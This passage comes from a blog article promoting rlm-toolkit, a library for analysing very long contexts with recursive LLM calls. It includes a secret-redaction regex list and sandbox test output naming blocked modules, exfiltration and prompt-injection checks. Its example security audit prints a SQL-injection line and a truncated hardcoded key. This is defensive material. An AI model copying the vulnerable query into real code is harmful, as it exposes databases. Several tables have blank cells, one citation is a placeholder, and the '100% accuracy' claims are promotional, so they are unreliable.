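    re.compile(r"\b[A-Za-z0-9]{32}\b"),                   # 32-character API keys
    re.compile(r"password\s*[:=]\s*\S+", re.IGNORECASE),  # password assignments incl. value
    re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),                 # US SSN format
]


def redact(text: str, placeholder: str = "[REDACTED]") -> str:
    """Replace every match of every sensitive pattern with the placeholder."""
    for pattern in SENSITIVE_PATTERNS:
        text = pattern.sub(placeholder, text)
    return text


print(redact("Client SSN: 123-45-6789"))
print(redact("password = hunter2 is set"))
```

A pattern as broad as "any 32 alphanumeric characters" will also match hashes and identifiers, so real deployments usually need to tune the list against their own logs.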
================================ test session starts ================================
collected 27 items
tests/security/test_blocked_imports.py::test_os_blocked PASSED
tests/security/test_blocked_imports.py::test_subprocess_blocked PASSED
tests/security/test_blocked_imports.py::test_socket_blocked PASSED
tests/security/test_blocked_imports.py::test_pickle_blocked PASSED
tests/security/test_blocked_imports.py::test_ctypes_blocked PASSED
tests/security/test_sandbox.py::test_timeout_enforcement PASSED
tests/security/test_sandbox.py::test_memory_limit PASSED
tests/security/test_sandbox.py::test_builtins_restricted PASSED
tests/security/test_sandbox.py::test_eval_blocked PASSED
tests/security/test_sandbox.py::test_exec_blocked PASSED
tests/security/test_exfiltration.py::test_network_blocked PASSED
tests/security/test_exfiltration.py::test_file_read_blocked PASSED
tests/security/test_obfuscation.py::test_base64_decode_blocked PASSED
tests/security/test_obfuscation.py::test_hex_decode_blocked PASSED
tests/security/test_obfuscation.py::test_rot13_blocked PASSED
tests/security/test_indirect.py::test_context_injection_blocked PASSED
tests/security/test_indirect.py::test_prompt_injection_detected PASSED
tests/security/test_builtins.py::test_globals_access_blocked PASSED
tests/security/test_builtins.py::test_builtins_access_blocked PASSED
tests/security/test_builtins.py::test_subclasses_blocked PASSED
tests/security/test_vfs.py::test_quota_enforcement PASSED
tests/security/test_vfs.py::test_path_traversal_blocked PASSED
tests/security/test_redaction.py::test_api_key_redacted PASSED
tests/security/test_redaction.py::test_password_redacted PASSED
tests/security/test_redaction.py::test_ssn_redacted PASSED
tests/security/test_circle.py::test_circle_benchmark_passed PASSED
tests/security/test_circle.py::test_all_attack_categories_blocked PASSED
================================ 27 passed in 12.34s ================================
| Category | Providers |
|---|---|
| Cloud API | OpenAI, Anthropic, Google, Mistral, Cohere, AI21 |
| Inference API | Together, Fireworks, Groq, Hyperbolic, Anyscale |
| Local | Ollama, vLLM, llama.cpp, LM Studio, LocalAI |
| Enterprise | Azure OpenAI, AWS Bedrock, GCP Vertex AI |
| Provider | Model | Context | Code Gen | Speed | Cost/1M tok |
|---|---|---|---|---|---|
| OpenAI | GPT-4o | 128K | ⭐⭐⭐⭐ | Fast | $5 |
| OpenAI | GPT-OSS-120B | 128K | ⭐⭐⭐⭐ | Fast | $3 |
| Anthropic | Claude Opus 4.5 | 200K | ⭐⭐⭐⭐⭐ | Medium | $15 |
| Anthropic | Claude Sonnet 4.5 | 200K | ⭐⭐⭐⭐⭐ | Fast | $3 |
| | Gemini 3 Pro | 2M | ⭐⭐⭐⭐ | Fast | $1.25 |
| | Gemini 3 Flash | 1M | ⭐⭐⭐⭐ | Very Fast | $0.08 |
| Meta | Llama 4 Scout | 10M | ⭐⭐⭐⭐ | Varies | Free |
| Alibaba | Qwen3-235B | 128K | ⭐⭐⭐⭐ | Fast | $0.50 |
| Mistral | Large 3 | 128K | ⭐⭐⭐⭐ | Fast | $2 |
💰 Budget-First:
from rlm_toolkit import RLM, RLMConfig
# Use factory methods for easy setup
rlm = RLM.from_ollama("llama4-scout")  # 100% free local
# Cost: $0 per 10M token analysis
🏆 Quality-First:
# Claude for best code generation
rlm = RLM.from_anthropic(
    root_model="claude-opus-4.5",
    sub_model="claude-haiku",
)
# Cost: ~$8 per 10M token analysis
🔒 Privacy-First (100% Local):
from rlm_toolkit.providers import OllamaProvider
rlm = RLM(
    root=OllamaProvider("llama4-scout:109b"),  # 10M native context!
    sub=OllamaProvider("qwen3:7b"),  # Fast inference
)
# Cost: $0 + electricity (~$0.50)
⚡ Speed-First:
# OpenAI is fastest cloud option
rlm = RLM.from_openai(
    root_model="gpt-4o",
    sub_model="gpt-4o-mini",
)
# Speed: ~2 min for 10M tokens
import os
import time
from rlm_toolkit import RLM, RLMConfig, SecurityConfig
from rlm_toolkit.memory import HierarchicalMemory
from rlm_toolkit.observability import ConsoleTracer
# Configuration
config = RLMConfig(
    max_iterations=50,
    max_cost=5.0,
    use_infiniretri=True,
    infiniretri_threshold=100_000,
    security=SecurityConfig(sandbox=True),
)
# Memory and tracing
memory = HierarchicalMemory()
tracer = ConsoleTracer(verbose=True)
# Initialize RLM
rlm = RLM.from_ollama(
    model="llama4-scout:109b",
    config=config,
    memory=memory,
    tracer=tracer,
)
# Load repository
def load_repo(path: str) -> str:
    content = []
    for root, dirs, files in os.walk(path):
        # Skip hidden and common excludes
        dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ['node_modules', '__pycache__', 'venv']]
        for f in files:
            if f.endswith(('.py', '.js', '.ts', '.go', '.rs')):
                filepath = os.path.join(root, f)
                try:
                    with open(filepath, encoding='utf-8') as fp:
                        content.append(f"\n\n# === FILE: {filepath} ===\n{fp.read()}")
                except (OSError, UnicodeDecodeError):
                    # Skip unreadable or non-UTF-8 files
                    pass
    return "".join(content)
codebase = load_repo("./my_project")
print(f"Loaded {len(codebase):,} characters ({len(codebase)//4:,} tokens)")
# Run analysis
start = time.time()
result = rlm.run(
    context=codebase,
    query="""
    Perform a full security audit of the codebase:
    1. SQL/NoSQL injections
    2. XSS vulnerabilities
    3. SSRF
    4. Hardcoded secrets
    5. Insecure deserialization
    6. Path traversal
    7. Authentication/authorization issues
    8. Race conditions
    For each vulnerability found, specify:
    - File and line
    - Vulnerability type
    - Severity (Critical/High/Medium/Low)
    - Recommended fix
    """,
)
elapsed = time.time() - start
print("\n" + "="*60)
print("RESULT:")
print("="*60)
print(result.answer)
print(f"\nTime: {elapsed:.1f}s")
print(f"Iterations: {result.iterations}")
print(f"Sub-calls: {result.subcalls}")
print(f"Cost: ${result.cost:.2f}")
[RLM] Starting analysis...
[RLM] Context size: 2,847,293 chars (711,823 tokens)
[RLM] Using InfiniRetri (threshold exceeded)
[Iter 1] Root LLM generating code...
>>> files = context.split("# === FILE:")
>>> print(f"Repository contains {len(files)} files")
Output: Repository contains 127 files
[Iter 2] Root LLM generating code...
>>> security_patterns = {
...     "sql_injection": [r"execute\(.*%s", r"\.format\(.*\)", r'f".*SELECT'],
...     "xss": [r"innerHTML\s*=", r"\.html\(.*\+"],
...     "secrets": [r"password\s*=\s*[\"']", r"api_key\s*=", r"secret\s*="],
... }
>>> import re
>>> findings = []
>>> for i, file in enumerate(files[1:], 1):
...     for vuln_type, patterns in security_patterns.items():
...         for pattern in patterns:
...             if re.search(pattern, file):
...                 findings.append((i, vuln_type, pattern))
>>> print(f"Found {len(findings)} potential issues")
Output: Found 23 potential issues
[Iter 3] Sub-LLM call for deep analysis...
>>> for file_idx, vuln_type, _ in findings[:5]:
...     file_content = files[file_idx][:6000]
...     analysis = llm_query(f"Analyze for {vuln_type}:\n{file_content}")
...     print(f"File {file_idx}: {analysis[:200]}")
[SUB-CALL 1/5] Analyzing file 3...
[SUB-CALL 2/5] Analyzing file 7...
[SUB-CALL 3/5] Analyzing file 12...
[SUB-CALL 4/5] Analyzing file 19...
[SUB-CALL 5/5] Analyzing file 24...
...
[Iter 8] Compiling final report...
>>> vulnerabilities = [
...     {"file": "api/users.py", "line": 42, "type": "SQL Injection",
...      "severity": "Critical", "code": "cursor.execute(f'SELECT * FROM users WHERE id={user_id}')"},
...     {"file": "utils/auth.py", "line": 87, "type": "Hardcoded Secret",
...      "severity": "High", "code": "API_KEY = 'sk-abc123...'"},
...     ...
... ]
>>> FINAL_VAR(vulnerabilities)
============================================================
RESULT:
============================================================
[
  {
    "file": "api/users.py",
    "line": 42,
    "type": "SQL Injection",
    "severity": "Critical",
    "description": "User input directly interpolated into SQL query",
    "recommendation": "Use parameterized queries: cursor.execute('SELECT * FROM users WHERE id=%s', (user_id,))"
  },
  {
    "file": "utils/auth.py",
    "line": 87,
    "type": "Hardcoded Secret",
    "severity": "High",
    "description": "API key hardcoded in source code",
    "recommendation": "Move to environment variable: os.environ.get('API_KEY')"
  },
  ...
]
Time: 127.3s
Iterations: 8
Sub-calls: 12
Cost: $0.00 (local model)
| Problem | Cause | Solution |
|---|---|---|
| | The LLM cannot find the answer | Increase |
| | Too many sub-calls | Limit |
| | Code runs for too long | Increase |
| | Import blocked by security | Add to the whitelist if it is safe |
| | OOM on a small model | Use a smaller |
from rlm_toolkit import RLM, RLMConfig
from rlm_toolkit.observability import ConsoleTracer, FileTracer
from rlm_toolkit.providers import OllamaProvider
# Console tracing (development)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=ConsoleTracer(verbose=True))
# File tracing (production)
rlm = RLM.from_ollama("llama4-scout:17b", tracer=FileTracer("./logs/rlm.log"))
# View execution history
result = rlm.run(context, query)
for step in result.trace:
    print(f"[{step.type}] {step.content[:100]}...")
# 1. Use smaller model for sub-calls
rlm = RLM(
    root=OllamaProvider("llama4-scout:109b"),  # Smart for planning
    sub=OllamaProvider("qwen3:7b"),  # Fast for details
)
# 2. Enable caching
from rlm_toolkit.cache import DiskCache
rlm = RLM.from_ollama("llama4-scout:17b", cache=DiskCache("./cache"))
# 3. Parallel sub-calls (experimental)
config = RLMConfig(parallel_subcalls=True, max_parallel=4)
| Component | Description | Source |
|---|---|---|
| RLM Core | Recursive Language Models | arxiv:2512.24601 |
| InfiniRetri | Attention-based infinite retrieval | arxiv:2502.12962 |
| H-MEM | Hierarchical memory | arxiv:2507.XXXXX |
| R-Zero | Self-evolving LLMs | arxiv:2508.05004 |
| REBASE | Experience replay | arxiv:2512.29379 |
| CIRCLE | Security benchmark | arxiv:2507.19399 |
- 10M+ tokens without quality degradation
- 100% accuracy on Needle-in-a-Haystack
- 4-level memory instead of a simple buffer
- 38 dangerous modules blocked: production-ready security
- 75+ providers, including 100% local options
PyPI: pypi.org/project/rlm-toolkit [15]
GitHub: github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit [16]
Documentation: docs [17]
pip install rlm-toolkit
# With the full set of integrations
pip install rlm-toolkit[all]
Questions? Write in the comments or open issues on GitHub!
About the author: developer of SENTINEL AI Security Platform, an open-source solution for protecting LLM applications.
Author: Dmitriila
Source [18]
BrainTools source site: https://www.braintools.ru
Path to the source page: https://www.braintools.ru/article/24430
URLs in this post:
[1] mathematics: http://www.braintools.ru/article/7620
[2] memory: http://www.braintools.ru/article/4140
[3] Problem: Context Rot, the mathematics of degradation: #problem
[4] Theory: formal definition of RLM: #theory
[5] InfiniRetri: architecture and algorithms: #infiniretri
[6] RAG vs KAG vs GraphRAG vs InfiniRetri: #comparison
[7] H-MEM: cognitive hierarchical memory: #hmem
[8] Self-Evolving: R-Zero and REBASE: #selfevolving
[9] Security Suite: CIRCLE compliance: #security
[10] Providers: comparative analysis: #providers
[11] Practice: complete examples with logs: #practice
[12] Troubleshooting: #troubleshooting
[13] Conclusion and arXiv links: #conclusion
[14] attention: http://www.braintools.ru/article/7595
[15] pypi.org/project/rlm-toolkit: https://pypi.org/project/rlm-toolkit/
[16] github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit: https://github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit
[17] docs: https://github.com/DmitrL-dev/AISecurity/tree/main/rlm-toolkit/docs
[18] Source: https://habr.com/ru/articles/986280/?utm_source=habrahabr&utm_medium=rss&utm_campaign=986280